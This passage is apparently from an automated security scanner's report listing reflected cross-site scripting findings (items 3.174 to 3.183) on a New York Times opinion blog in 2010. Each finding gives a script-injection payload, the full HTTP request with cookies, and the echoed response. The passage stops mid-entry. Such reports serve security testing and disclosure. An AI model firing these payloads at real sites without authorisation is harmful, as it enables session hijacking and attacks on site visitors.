GET /2010/11/11/a-republican-for-higher-taxes/?src=meb51c1"><script>alert(1)</script>380bf182eb4&ref=homepage HTTP/1.1 Host: opinionator.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;
Response
HTTP/1.1 200 OK Date: Sat, 13 Nov 2010 02:09:43 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 X-Pad: avoid browser bug Content-Length: 64109
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... Now1,JMNow2,JMNow3,JMNow4,JMNow5,JMNow6,Feature1,Spon3,ADX_CLIENTSIDE&query=qstring&keywords=politics;law;science;domesticity;banking;the+West+Coast+;david-stockman;deficit;taxes;william-d-cohan&src=meb51c1\"><script>alert(1)</script>380bf182eb4"> ...[SNIP]...
3.174. http://opinionator.blogs.nytimes.com/2010/11/12/a-deficit-of-respect/ [src parameter]
Summary
Severity: High
Confidence: Certain
Host: http://opinionator.blogs.nytimes.com
Path: /2010/11/12/a-deficit-of-respect/
Issue detail
The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1cb5b"><script>alert(1)</script>23c8535c0f2 was submitted in the src parameter. This input was echoed as 1cb5b\"><script>alert(1)</script>23c8535c0f2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/12/a-deficit-of-respect/?src=twr1cb5b"><script>alert(1)</script>23c8535c0f2 HTTP/1.1 Host: opinionator.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;
Response
HTTP/1.1 200 OK Date: Sat, 13 Nov 2010 02:08:00 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 X-Pad: avoid browser bug Content-Length: 72784
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... CLIENTSIDE&query=qstring&keywords=politics;law;science;domesticity;banking;the+West+Coast+;alan-simpson;budget;erskine-bowles;federal-deficit;health-care-reform;social-security;taxes;the-thread&src=twr1cb5b\"><script>alert(1)</script>23c8535c0f2"> ...[SNIP]...
3.175. http://opinionator.blogs.nytimes.com/2010/11/12/the-ways-of-empathy/ [src parameter]
Summary
Severity: High
Confidence: Certain
Host: http://opinionator.blogs.nytimes.com
Path: /2010/11/12/the-ways-of-empathy/
Issue detail
The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ea26"><script>alert(1)</script>1e6f397c31 was submitted in the src parameter. This input was echoed as 4ea26\"><script>alert(1)</script>1e6f397c31 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/12/the-ways-of-empathy/?src=twr4ea26"><script>alert(1)</script>1e6f397c31 HTTP/1.1 Host: opinionator.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;
Response
HTTP/1.1 200 OK Date: Sat, 13 Nov 2010 02:09:43 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 X-Pad: avoid browser bug Content-Length: 71082
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... eft7,Left8,Left9,JMNow1,JMNow2,JMNow3,JMNow4,JMNow5,JMNow6,Feature1,Spon3,ADX_CLIENTSIDE&query=qstring&keywords=politics;law;science;domesticity;banking;the+West+Coast+;bullying;fixes;_featured&src=twr4ea26\"><script>alert(1)</script>1e6f397c31"> ...[SNIP]...
3.176. http://opinionator.blogs.nytimes.com/category/alec-soth [REST URL parameter 2]
Summary
Severity: High
Confidence: Certain
Host: http://opinionator.blogs.nytimes.com
Path: /category/alec-soth
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62045"><script>alert(1)</script>d5bdd9c1f68 was submitted in the REST URL parameter 2. This input was echoed as 62045\"><script>alert(1)</script>d5bdd9c1f68 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/alec-soth62045"><script>alert(1)</script>d5bdd9c1f68 HTTP/1.1 Host: opinionator.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;
Response
HTTP/1.1 404 Not Found Date: Sat, 13 Nov 2010 02:22:03 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sat, 13 Nov 2010 02:22:03 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 43778
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... <script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/alec-soth62045\"><script>alert(1)</script>d5bdd9c1f68&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr ...[SNIP]...
3.177. http://opinionator.blogs.nytimes.com/category/alec-soth/feed/ [REST URL parameter 3]
Summary
Severity: High
Confidence: Certain
Host: http://opinionator.blogs.nytimes.com
Path: /category/alec-soth/feed/
Issue detail
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bddd1"><script>alert(1)</script>fc7205605c8 was submitted in the REST URL parameter 3. This input was echoed as bddd1\"><script>alert(1)</script>fc7205605c8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/alec-soth/feedbddd1"><script>alert(1)</script>fc7205605c8/ HTTP/1.1 Host: opinionator.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;
Response
HTTP/1.1 404 Not Found Date: Sat, 13 Nov 2010 02:20:01 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sat, 13 Nov 2010 02:20:01 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 43833
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... <script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/alec-soth/feedbddd1\"><script>alert(1)</script>fc7205605c8&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr ...[SNIP]...
3.178. http://opinionator.blogs.nytimes.com/category/alec-soth/page/2/ [REST URL parameter 3]
Summary
Severity: High
Confidence: Certain
Host: http://opinionator.blogs.nytimes.com
Path: /category/alec-soth/page/2/
Issue detail
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43912"><script>alert(1)</script>d4a4c69cacb was submitted in the REST URL parameter 3. This input was echoed as 43912\"><script>alert(1)</script>d4a4c69cacb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/alec-soth/page43912"><script>alert(1)</script>d4a4c69cacb/2/ HTTP/1.1 Host: opinionator.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;
Response
HTTP/1.1 404 Not Found Date: Sat, 13 Nov 2010 02:22:44 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sat, 13 Nov 2010 02:22:44 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 43855
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... <script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/alec-soth/page43912\"><script>alert(1)</script>d4a4c69cacb/2&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B, ...[SNIP]...
3.179. http://opinionator.blogs.nytimes.com/category/allison-arieff [REST URL parameter 2]
Summary
Severity: High
Confidence: Certain
Host: http://opinionator.blogs.nytimes.com
Path: /category/allison-arieff
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8cc60"><script>alert(1)</script>34ddd92904c was submitted in the REST URL parameter 2. This input was echoed as 8cc60\"><script>alert(1)</script>34ddd92904c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/allison-arieff8cc60"><script>alert(1)</script>34ddd92904c HTTP/1.1 Host: opinionator.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;
Response
HTTP/1.1 404 Not Found Date: Sat, 13 Nov 2010 02:16:00 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sat, 13 Nov 2010 02:16:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 43833
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... <script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/allison-arieff8cc60\"><script>alert(1)</script>34ddd92904c&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr ...[SNIP]...
3.180. http://opinionator.blogs.nytimes.com/category/allison-arieff/feed/ [REST URL parameter 3]
Summary
Severity: High
Confidence: Certain
Host: http://opinionator.blogs.nytimes.com
Path: /category/allison-arieff/feed/
Issue detail
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4fd36"><script>alert(1)</script>75e2794e565 was submitted in the REST URL parameter 3. This input was echoed as 4fd36\"><script>alert(1)</script>75e2794e565 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/allison-arieff/feed4fd36"><script>alert(1)</script>75e2794e565/ HTTP/1.1 Host: opinionator.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;
Response
HTTP/1.1 404 Not Found Date: Sat, 13 Nov 2010 02:12:52 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sat, 13 Nov 2010 02:12:52 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 43888
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... <script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/allison-arieff/feed4fd36\"><script>alert(1)</script>75e2794e565&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr ...[SNIP]...
3.181. http://opinionator.blogs.nytimes.com/category/allison-arieff/page/2/ [REST URL parameter 3]
Summary
Severity: High
Confidence: Certain
Host: http://opinionator.blogs.nytimes.com
Path: /category/allison-arieff/page/2/
Issue detail
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15c39"><script>alert(1)</script>39c9a1dd378 was submitted in the REST URL parameter 3. This input was echoed as 15c39\"><script>alert(1)</script>39c9a1dd378 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/allison-arieff/page15c39"><script>alert(1)</script>39c9a1dd378/2/ HTTP/1.1 Host: opinionator.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;
Response
HTTP/1.1 404 Not Found Date: Sat, 13 Nov 2010 02:16:37 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sat, 13 Nov 2010 02:16:37 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 43910
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... <script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/allison-arieff/page15c39\"><script>alert(1)</script>39c9a1dd378/2&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B, ...[SNIP]...
3.182. http://opinionator.blogs.nytimes.com/category/dick-cavett [REST URL parameter 2]
Summary
Severity: High
Confidence: Certain
Host: http://opinionator.blogs.nytimes.com
Path: /category/dick-cavett
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea706"><script>alert(1)</script>3b4fefc3f96 was submitted in the REST URL parameter 2. This input was echoed as ea706\"><script>alert(1)</script>3b4fefc3f96 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/dick-cavettea706"><script>alert(1)</script>3b4fefc3f96 HTTP/1.1 Host: opinionator.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;
Response
HTTP/1.1 404 Not Found Date: Sat, 13 Nov 2010 02:16:58 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sat, 13 Nov 2010 02:16:58 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 43800
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... <script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/dick-cavettea706\"><script>alert(1)</script>3b4fefc3f96&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr ...[SNIP]...
3.183. http://opinionator.blogs.nytimes.com/category/dick-cavett/feed/ [REST URL parameter 3]
Summary
Severity: High
Confidence: Certain
Host: http://opinionator.blogs.nytimes.com
Path: /category/dick-cavett/feed/
Issue detail
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57e8a"><script>alert(1)</script>fe172a7552a was submitted in the REST URL parameter 3. This input was echoed as 57e8a\"><script>alert(1)</script>fe172a7552a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
